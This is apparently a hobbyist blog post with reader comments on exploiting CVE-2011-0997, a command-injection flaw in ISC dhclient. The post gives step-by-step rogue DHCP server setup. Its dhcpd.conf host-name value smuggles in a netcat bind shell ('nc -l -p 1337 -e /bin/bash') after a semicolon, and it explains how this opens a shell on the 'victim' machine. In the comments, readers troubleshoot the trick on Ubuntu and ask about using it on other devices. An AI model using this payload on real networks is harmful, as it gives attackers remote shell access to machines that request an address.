Saw a killer dhcp client bug come across the wire the other day and thought it would be fun to play around with. Heres some info on it:
dhclient in ISC DHCP 3.0.x through 4.2.x before 4.2.1-P1, 3.1-ESV before 3.1-ESV-R1, and 4.1-ESV before 4.1-ESV-R2 allows remote attackers to execute arbitrary commands via shell metacharacters in a hostname obtained from a DHCP message.
source: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0997
This is super easy to exploit, all you need to do is set up a DHCP server and edit the clients hostname to include our payload! Once you get dhcp up and running edit your /etc/dchp3/dhcpd.conf and locate the line that loks something like this:
subnet 10.10.5.0 netmask 255.255.255.0 {
Then right under it add something like this:
option host-name "test;nc -l -p 1337 -e /bin/bash";
Now using the above payload when someone requests an IP from you and its accepted a shell will open on port 1337 on their machine 😀
What happens is the victims computer gets the hostname value from DHCP, then just runs it against the shell. Now because we added a shell metacharacter “;” we are telling the shell that it has multipliable commands to execute which in the above case its the commands to change the hostname to test and “nc -l -p 1337 -e /bin/bash”. Fun right? Ok thats it, peace.
This trick works only when a client does not have hostname entry.
btw. what distro did you tested?
Oh crap, good catch on that. Thank you. Yes the victim hes to be setup to get its hostname from DHCP and i tested it on Ubuntu.
In what version of ubuntu you tried it?
I’m working on a 10.10 non patched but the trick it’s not working, can you give me more informations?
Best regards,
inode
Its been a while but i think i was using 10.04
how to setup dhclient to obatin hostname from dhcp server and set it as hostname ?
add host-name to the list of requests in /etc/dhcp3/dhclient.conf
tnx 🙂 now it works and get host-name ! but ‘;’ wont escape,my hostname become somthing like this !
nima@clientname;nc -l -p 4444 -e /bin/bash$
again tnx for your attention
Bit late, I know, but would this trick be able to force open a port for SSH on the time capsule itself? That would be cool, if there was a way.
sure I don’t see why not.